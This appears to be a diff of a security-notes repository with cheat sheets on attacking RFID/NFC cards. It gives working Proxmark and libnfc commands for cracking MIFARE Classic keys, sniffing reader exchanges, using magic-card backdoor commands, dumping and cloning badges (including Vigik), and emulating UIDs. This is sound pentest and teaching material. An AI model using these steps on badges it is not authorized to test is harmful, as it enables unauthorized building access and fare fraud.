For newest MIFARE Classic and MIFARE Plus SL1
**Proxmark method**
:warning: NOTE: These hardware changes resulted in the Proxmark 3 Easy being incapable of performing several of the Proxmark's advanced features, including the Mifare Hard-Nested attacks. In other word you need a real Proxmark, not a cheap chinese copy.
```powershell
# find a default key
# res column is either equal to 1 or 0.
# A 1 in the column means the key was valid for that sector.
hf mf chk *1 ? t
# <block number> <key A|B> <key (12 hex symbols)>
# <target block number> <target key A|B> [known target key (12 hex symbols)] [w] [s]
# w: Acquire nonces and write them to binary file nonces.bin
hf mf hardnested 0 A 8829da9daf76 4 A w
# then https://github.com/aczid/crypto1_bs
./solve_piwi 0xcafec0de.bin
./solve_piwi_bs 0xcafec0de.bin
```
**ACR122u method**
With the key n°A a0a1a2a3a4a5 for sector 0 and we want key n°A for sector 1. This method can be reused for every sectors.
```powershell
./libnfc_crypto1_crack a0a1a2a3a4a5 0 a 4 a
Found tag with uid 62ef9e5a, collecting nonces for key A of block 4 (sector 1) using known key A a0a1a2a3a4a5 for block 0 (sector 0)
Collected 2379 nonces... leftover complexity 23833993588 (~2^34.47) - initializing brute-force phase...
Starting 4 threads to test 23833993588 states using 256-way bitslicing
Cracking... 88.93%
Found key: c44e2b5e4ce3
Tested 21232975852 states
```
### Magic Chinese Card - Acronyms
**UID** - The original Chinese Magic Backdoor card. These cards respond to the backdoor commands and will show Chinese magic backdoor commands (GEN 1a) detected when you do an hf search. These cards can be detected by probing the card to see if it responds to the backdoor commands. Some RFID systems may try to detect these cards.
**CUID** - The 2nd generation Chinese Magic Backdoor card. These cards do not use the backdoor commands, but instead allow Block 0 to be written to like any other block on the card. This gives the card better compatibility to be written to from an Android phone. However, some RFID systems can detect this type of card by sending a write command to Block 0, making the card invalid after the first use is attempted.
**FUID** - This type of card is not as common, but allows Block 0 to be written to just once. This allows you to create a clone of a card and any checks done by the RFID system will pass because Block 0 is no longer writable.
**UFUID** - This type of card is apparently a "better" version of the FUID card. Instead of only allowing Block 0 to be written once, you can write to it many times and then lock the block later when you're happy with the result. After locking Block 0, it cannot be unlocked to my knowledge. I do not think there is currently a way to lock these cards using the Proxmark3.
### Magic Chinese Card - GEN 2
They can be copied directly. The software allows a new UID.
### Magic Chinese Card - GEN 1a
> **Works better on the official client.py instead of the iceman fork.**
Reset a UID Changeable Magic Card (7 bytes UID) :warning: You should prefer this method !
```powershell
proxmark3> hf mf csetuid 42917CAB 0004 08
uid:42 91 7c ab
--atqa:00 04 sak:08
Chinese magic backdoor commands (GEN 1a) detected
```
To set all the block `hf mf csetblk 0 42917CAB00080400022A2C87933EF21D`
NOTE: The UID from several cards can be computed with the displayed id, e.g: ID is 2910621770.
```python
import struct
struct.pack('<I',2910621770).encode('hex')
'4a907cad'
```
### Unbricking Chinese Magic Mifare Classic
If you set the wrong BCC for UID and can't read the card anymore, you can use some backdoor commands to change sector 0 using Proxmark:
```powershell
hf 14a raw -a -p -b 7 40
hf 14a raw -p 43
hf 14a raw -p -c a0 00
hf 14a raw -p -c de ad be ef 22 08 04 00 46 59 25 58 49 10 23 02
```
### Key Bruteforce/Dictionary attack
* [ikarus23/MifareClassicTool/std.keys](https://github.com/ikarus23/MifareClassicTool/blob/master/Mifare%20Classic%20Tool/app/src/main/assets/key-files/std.keys)
* [ikarus23/MifareClassicTool/extended-std.keys](https://github.com/ikarus23/MifareClassicTool/blob/master/Mifare%20Classic%20Tool/app/src/main/assets/key-files/extended-std.keys)
```powershell
hf mf chk *1 ? t # Default keys
hf mf chk *1 ? d default_keys.dic
hf mf chk 0 A default_keys.dic # Dictionary attack with file: default_keys.dic
```
### Write and read sectors
> Avoid writing wrbl 3 (contains key A/B + permissions)
```powershell
proxmark3> hf mf wrbl 1 a ffffffffffff 000102030405060708090a0b0c0d0e0f
proxmark3> hf mf wrbl 2 a ffffffffffff 464c4147313a4d31664072335f303037
```
```powershell
hf mf rdsc <sector number> <key A/B> <key (12 hex symbols)>
```
### Dump Mifare card
```powershell
proxmark3> hf mf dump 1 k hf-mf-A29558E4-key.bin f hf-mf-A29558E4-data.bin
<card memory>: 0 = 320 bytes (Mifare Mini), 1 = 1K (default), 2 = 2K, 4 = 4K
k <name> : key filename, if no <name> given, UID will be used as filename
f <name> : data filename, if no <name> given, UID will be used as filename
```
### Simulate and emulate Mifare card
Emulate from a dump file
```powershell
# convert .bin to .eml
proxmark3> script run dumptoemul -i dumpdata.bin
proxmark3> hf mf eload <file name w/o .eml>
```
Simulate Mifare 1K UID
```powershell
proxmark3> hf mf sim u 353c2aa6
```
### MITM attack
```powershell
hf 14a snoop
# read card
# push button
hf list 14a
089220 | 095108 | Tag | 4d xx xx xx d3 | | UID
114608 | 125072 | Rdr | 93 70 4d xx xx xx d3 4f 8d | ok | SELECT_UID
...
525076 | 529748 | Tag | 61 7a 66 18 | | TAG CHALLENGE
540608 | 549920 | Rdr |50! 87! 8e ab 3b! 49 5a 1b | !crc| HALT
551188 | 555860 | Tag |d6! 53! 7c 57! | | TAG RESPONSE
UID: 4dxxxxxxd3
TAG CHALLENGE: 617a6618
READER CHALLENGE: 50878eab
READER RESPONSE: 3b495a1b
TAG RESPONSE: d6537c57
# crapto1gui or mfkey
cd tools/mfkey
make
./mfkey64
./mfkey64 xxxxxxxx 3b45a45a 7ddb6646 142fc1b9 9195fb3f
```
### Reader only attack
Emulate a MIFARE Classic with a DEADBEEF UID.
```powershell
proxmark3> hf mf sim u deadbeef n 1 x
mf 1k sim uid: de ad be ef , numreads:0, flags:18 (0x12)
#db# Collected two pairs of AR/NR which can be used to extract keyA from reader for sector 1:
#db# ../tools/mfkey/mfkey32 deadbeef 0102xxxx 4d9axxxx 87e7xxxx 06d2xxxx b4a0xxxx
#db# Emulator stopped. Tracing: 1 trace length: 253
#db# 4B UID: deadbeef
```
### Read a Mifare Dump
```powershell
pip install bitstring
git clone https://github.com/zhovner/mfdread
mfdread.py ./dump.mfd
```
## HF - Mifare Classic 4k
### Chinese Magic Mifare Classic 4K
Block 0 is writable through normal Mifare Classic commands, i.e. there is not special "unlocked" read/write like in "magic Mifare 1k" version.
Writing block 0 with Proxmark, UID `01020304`, using key A being `FFFFFFFFFFFF`:
```powershell
hf mf wrbl 0 a FFFFFFFFFFFF 01020304040000000000000000000000
```
Again, watch out to have correct BCC and avoid Cascading Tag (0x88) as first byte of UID, or you may make the card unselectable (i.e. brick it).
## References
* [Mifare HowTo - Qais Patankar - Jan 7, 2018](https://github.com/Proxmark/proxmark3/wiki/Mifare-HowTo)
* [Proxmark3 Mifare Classic 1k Weak / Hard - Guillaume - November 29, 2017](https://guillaumeplayground.net/proxmark3-hardnested/)
* [Electronique/Hardware/Divers/RFID/Proxmak3/Mf (Mifare) - 12 janvier 2022](https://www.ordinoscope.net/index.php/Electronique/Hardware/Divers/RFID/Proxmak3/Mf_(Mifare))
* [Proxmark 3, le couteau suisse RFID - Bourdin Pierre - octobre 2017](https://connect.ed-diamond.com/MISC/MISCHS-016/Proxmark-3-le-couteau-suisse-RFID)
* [Hacking MIFARE & RFID - phantasmthewhite - Jan 22, 2019](https://hackmethod.com/hacking-mifare-rfid/)
* [Hacking our first MIFARE/RFID Tag - phantasmthewhite - Feb 1, 2019](https://hackmethod.com/hacking-mifare-rfid-2/)
* [Coffee, NFC, Exploit, Coffee again - ari_ - 14 NOVEMBER 2017](http://arishitz.net/coffee-nfc-exploit-coffee-again/)
* [ACR122U, mfcuk, and mfoc: Cracking MIFARE Classic on Arch Linux - Linus Karlsson - 2014-08-18](https://linuskarlsson.se/blog/acr122u-mfcuk-and-mfoc-cracking-mifare-classic-on-arch-linux/)
* [Reading NFC cards - Flipper Docs](https://docs.flipper.net/nfc/read)

View File

@ -0,0 +1,146 @@
# HF - Mifare DESFire
## DESFire® Format
* Mifare DESFire [MF3ICD40](https://arstechnica.com/information-technology/2011/10/researchers-hack-crypto-on-rfid-smart-cards-used-for-keyless-entry-and-transit-pass/): uses 3DES encryption, product discontinued.
* **Mifare DESFire EV1** : Secure channel that can work with all the keys: DES, two-key 3DES, three-key 3DES and AES. Limited to 28 applications containing a maximum of 32 files per application.
* **Mifare DESFire EV2** : The newest channel that can work with aes key only
* **Mifare DESFire EV3** : Enhanced transaction speed and even better multi-application support.
Each card has a master application with AID `0x000000` that saves the card's configuration.
The memory organization of DESFire supports up to 28 applications on the card and up to 32 files in each application.
* Master Application (0x000000)
* Applications
* Files
### Applications
```ps1
hf mfdes lsapp --no-auth # show applications list without authentication
hf mfdes lsapp # show applications list with authentication from default settings
hf mfdes lsapp --files # show applications list with their files
hf mfdes getaids --no-auth # this command can return a simple AID list if it is enabled in the card settings
```
Each application has an individual set of up to 14 application keys (can be AES-128 or DES keys)
### Files
* **Standard** File: used for static data like a employee ID
* **Backup** File: like a Standard File but with a "Commit" feature that allows for secure storage of data, e.g. a changeable user password
* **Value** File: storing changeable value information, e.g. the amount on a canteen payment card
* **Linear Record** File: storing a defined number of records, e.g. collecting of goodies
* **Cyclic Record** File: like a Linear Record file but this file doesn't get "full" but the oldest entry gets overwritten by a new entry, e.g. for a log file
Each file has its own **Communication Mode**:
* **Plain**: all data transfer between the NFC tag and the NFC reader is done in plain
* **MACed**: like in Plain mode the communication is is readable but secured by an appended MAC
* **Encrypted**: the communication is not visible be anyone, but only who posses the used key is been able to read the data.
**Dump files**
```ps1
hf mfdes lsfiles --aid 123456 -t aes # file list for application 123456 with aes key
hf mfdes dump --aid 123456 # shows files and their contents from application 123456
```
**Read/Write files**
Read
```ps1
hf mfdes read --aid 123456 --fid 01 # autodetect file type (with hf mfdes getfilesettings) and read its contents
hf mfdes read --aid 123456 --fid 01 --type record --offset 000000 --length 000001 # read one last record from a record file
```
Read via ISO command set
```ps1
hf mfdes read --aid 123456 --fileisoid 1000 --type data -c iso # select application via native command and then read file via ISO
hf mfdes read --appisoid 0102 --fileisoid 1000 --type data -c iso # select all via ISO commands and then read
hf mfdes read --appisoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000001 # read one record (number 5) from file ID 1100 via ISO command set
hf mfdes read --appisoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000000 # read all the records (from 5 to 1) from file ID 1100 via ISO command set
```
Write
```ps1
hf mfdes write --aid 123456 --fid 01 -d 01020304 # autodetect file type (with hf mfdes getfilesettings) and write data with offset 0
hf mfdes write --aid 123456 --fid 01 --type data -d 01020304 --commit # write backup data file and commit
hf mfdes write --aid 123456 --fid 01 --type value -d 00000001 # increment value file
hf mfdes write --aid 123456 --fid 01 --type value -d 00000001 --debit # decrement value file
hf mfdes write --aid 123456 --fid 01 --type record -d 01020304 # write data to a record file
hf mfdes write --aid 123456 --fid 01 --type record -d 01020304 --updaterec 0 # update record 0 (latest) in the record file.
```
Write via iso command set
```ps1
hf mfdes write --appisoid 1234 --fileisoid 1000 --type data -c iso -d 01020304 # write data to std/backup file via ISO command set
hf mfdes write --appisoid 1234 --fileisoid 2000 --type record -c iso -d 01020304 # send record to record file via ISO command set
```
## Default Keys
Changing the default keys is a crucial step in the deployment of MIFARE DESFire cards to prevent unauthorized cloning and access.
* Default AES key
```
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
```
* Default DES key
```
00 00 00 00 00 00 00 00
```
Use a key to get UID
```ps1
hf mfdes getuid # authenticate with default key
hf mfdes getuid -s d40 # via d40 secure channel
hf mfdes getuid -s ev2 -t aes -k 11223344556677889900112233445566 # via ev2 secure channel with specified aes key
```
```ps1
hf mfdes detect # simply detect key for master application (PICC level)
hf mfdes detect --save # detect key and save to defaults. look after to output of hf mfdes default
hf mfdes detect -s d40 # detect via channel d40
hf mfdes detect --dict mfdes_default_keys # detect key with help of dictionary file
hf mfdes detect --aid 123456 -n 2 # detect key 2 from application with AID 123456
```
```ps1
hf mfdes auth -n 0 -t des -k 1122334455667788 --aid 123456 # try application 123456 master key
hf mfdes auth -n 0 -t aes --save # try PICC AES master key and save the configuration to defaults if authentication succeeds
```
## UID check
The UID of the modifiable MIFARE DESFire® Compatible UID tags consists of two parts: the UID itself and the BCC. The BCC is a checksum value calculated from the UID. If the BCC is incorrect, the tag will be rejected by the reader.
```ps1
hf 14a raw -s -c 02 00 ab 00 00 00 07 xx xx xx xx xx xx xx xx xx
```
For MIFARE DESFire cards, Flipper Zero is able to emulate only the UID.
UID rewritable cards:
- [LAB 401 - MODIFIABLE MIFARE DESFIRE® COMPATIBLE UID](https://lab401.com/fr/products/desfire-compatible-emulator-uid-modifiable)
- [LAB 401 - MIFARE DESFIRE® COMPATIBLE MODIFIABLE UID / ATQA / SAK / ATS / APDU](https://lab401.com/products/mifare-desfire-ev2-compatible-modifiable-uid-atqa-sak-ats-apdu)
## References
* [Mifare DESFire EV3 — a beginner tutorial (Android Java) using the DESFire for Android tools - AndroidCrypto - Feb 18, 2024](https://medium.com/@androidcrypto/mifare-desfire-ev3-a-beginner-tutorial-android-java-using-the-desfire-for-android-tools-00aaecb8fa93)
* [Mifare DESFire EVx NFC tag: Change the Master Application Key from DES to AES (Android/Java) - AndroidCrypto - Jun 19, 2024](https://medium.com/@androidcrypto/mifare-desfire-evx-nfc-tag-change-the-master-application-key-from-des-to-aes-android-java-e5dcf02861ff)
* [DESFireChangeMasterAppKey - AndroidCrypto - Jun 19, 2024](https://github.com/AndroidCrypto/DESFireChangeMasterAppKey)
* [Notes on MIFARE DESFire - iceman1001 - 2021](https://github.com/RfidResearchGroup/proxmark3/blob/master/doc/desfire.md)
* [Mifare DESFire - An Introduction - David Coelho - 19 mai 2019](https://www.linkedin.com/pulse/mifare-desfire-introduction-david-coelho/)
* [AN-315 - Understanding MIFARE DESFire Credentials - ICT | Protege - 11-May-22](https://ict.co/media/3zznd34z/an-315_understanding_protege_mifare_desfire_credentials.pdf)
* [MIFARE DESFire gallagher-research - megabug](https://github.com/megabug/gallagher-research/blob/master/formats/card-specific/mifare-desfire.md)

View File

@ -0,0 +1,30 @@
# HF - Mifare UltraLight
* Ultralight C (3DES authentication)
* Ultralight EV1
* NTAG2
## Chinese backdoor
```powershell
pm3 --> hf 14a raw -p -b 7 40
pm3 --> hf 14a raw -p 43
pm3 --> hf 14a raw -p -c a20059982120
0x40, init backdoor mode
0x41, wipe fills card with 0xFF
0x42, fills card with 0x00
0x43, no authentication needed. issue a 0x3000 to read block 0, or write block.
0x44, fills card with 0x55
```
## Simulate
```powershell
hf 14a sim 2 <7-byte tag>
```
## References
* []()

View File

@ -0,0 +1,19 @@
# NFC - RFID
> Radio Frequency Identification (RFID) & Near Field Communication (NFC)
## Notes about card types
* **MIFARE Classic 1K/4K**: basically just a memory storage device. This memory, either 1024 or 4096 bytes, is divided into sectors and blocks. Most of the time used for regular access badges and has really simple security mechanisms for access control
* **MIFARE Ultralight**: a 64 bytes version of MIFARE Classic. Its low costs make it widely used as disposable tickets for events or transportation.
* **MIFARE Plus**: announced as a replacement of MIFARE Classic. The Plus subfamily brings the new level of security up to 128-bit AES encryption.
* **MIFARE DESFire**: those tags come pre-programmed with a general purpose DESFire operating system which offers a simple directory structure and files, and are the type of MIFARE offering the highest security levels.
## References
* [RFID Hacking with The Proxmark 3 - Kevin Chung - May 29, 2017](https://blog.kchung.co/rfid-hacking-with-the-proxmark-3/)
* [RFID Le clone parfait - Alex - 12 juillet 2017](https://www.latelierdugeek.fr/2017/07/12/rfid-le-clone-parfait/)
* [Proxmark 3, le couteau suisse RFID - Bourdin Pierre - octobre 2017](https://connect.ed-diamond.com/MISC/MISCHS-016/Proxmark-3-le-couteau-suisse-RFID)
* [A 2018 practical guide to hacking NFC/RFID - Sławomir Jasek - 4.06.2018](https://smartlockpicking.com/slides/Confidence_A_2018_Practical_Guide_To_Hacking_RFID_NFC.pdf)
* [Infosec - NFC Mifare - @SecurityGuill](https://securityguill.com/nfc_mifare.html)

View File

@ -0,0 +1,18 @@
# Relay & Replay
## Replay Attacks
Replay attack is a technique where a malicious user could implement a device to intercept a NFC transaction and redeem it later, using other device or even in different location.
## Relay Attack
The relay attack is a technique where a malicious user implements a man in the middle attack. The attacker(APDUer) is capable to intercept, manipulate and change the transaction in real time to take advantage of it. [https://en.wikipedia.org/wiki/Relay_attack](https://en.wikipedia.org/wiki/Relay_attack)
* NFC Payment Relay Attacks - [intro-to-nfc-payment-relay-attacks/](https://salmg.net/2018/12/01/intro-to-nfc-payment-relay-attacks/)
* NFCopy85 is a 10 dollars device to make replay attacks against NFC payment systems - [nfcopy85](https://salmg.net/2019/06/16/nfcopy85/)
## References
* []()

View File

@ -0,0 +1,20 @@
# HF - Vigik
Vigik is essentially a rebranded version of MIFARE Classic because it uses the same underlying technology and standards.
* [cjbrigato/kigiv-for-proxmark3](https://github.com/cjbrigato/kigiv-for-proxmark3/releases) - KIGIV stands for Reverse VIGIK, the French Residential and Postal/State services Residential Security system.
```powershell
modprobe -r pn533_usb
modprobe -r pn533
nfc-list # Check the proper functioning of the reader
mfoc -P 500 -O blank-card.dmp # Extract the encryption keys from the Chinese RFID chip into a file
mfoc -P 500 -O original-card.dmp # Copy the content of the original RFID chip into a file
nfc-mfclassic W a original-card.dmp blank-card.dmp # Write the content of the original chip onto the Chinese chip
```
## References
* []()

View File

@ -19,4 +19,5 @@
## References ## References
* [HydraUSB3 v1.0 Specifications](https://hydrabus.com/hydrausb3-v1-0-specifications) * [HydraUSB3 v1.0 Specifications](https://hydrabus.com/hydrausb3-v1-0-specifications)
* [Nullcon Goa 2023 | Cracking With Automated USB Fuzz - Subba Bachina & Conna - 31 dec. 2023](https://youtu.be/4uHg6toV69k) * [Nullcon Goa 2023 | Cracking With Automated USB Fuzz - Subba Bachina & Conna - 31 dec. 2023](https://youtu.be/4uHg6toV69k)
* [Hands On with Chip Off Non-Volatile Memory - Philip DuBois - June 11, 2024](https://trustedsec.com/blog/hands-on-with-chip-off-non-volatile-memory)

View File

@ -58,4 +58,5 @@ Here is a practical example, putting a cable between MOSI and Chip Select :
* [rhme-2016 write-up Fault Injection - hydrabus](https://github.com/hydrabus/rhme-2016/tree/master/FaultInjection) * [rhme-2016 write-up Fault Injection - hydrabus](https://github.com/hydrabus/rhme-2016/tree/master/FaultInjection)
* [Solving rhme fiesta from Riscure Hardware CTF 2016 with EM Fault Injection - Dangling Pointr - 2020, Oct 11](https://pedro-javierf.github.io/devblog/rhmefaultinjection/) * [Solving rhme fiesta from Riscure Hardware CTF 2016 with EM Fault Injection - Dangling Pointr - 2020, Oct 11](https://pedro-javierf.github.io/devblog/rhmefaultinjection/)
* [Hardware Power Glitch Attack (Fault Injection) - rhme2 Fiesta (FI 100) - LiveOverflow - 16 june 2017](https://www.youtube.com/watch?v=6Pf3pY3GxBM) * [Hardware Power Glitch Attack (Fault Injection) - rhme2 Fiesta (FI 100) - LiveOverflow - 16 june 2017](https://www.youtube.com/watch?v=6Pf3pY3GxBM)
* [pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle - Brad Dixon - Carve Systems - DEFCON 24](https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEF%20CON%2024%20-%20Brad-Dixon-Pin2Pwn-How-to-Root-An-Embedded-Linux-Box-With-A-Sewing-Needle-UPDATED.pdf) * [pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle - Brad Dixon - Carve Systems - DEFCON 24](https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEF%20CON%2024%20-%20Brad-Dixon-Pin2Pwn-How-to-Root-An-Embedded-Linux-Box-With-A-Sewing-Needle-UPDATED.pdf)
* [Replicant: Reproducing a Fault Injection Attack on the Trezor One - Voidstar - AUGUST 2022](https://voidstarsec.com/blog/replicant-part-1)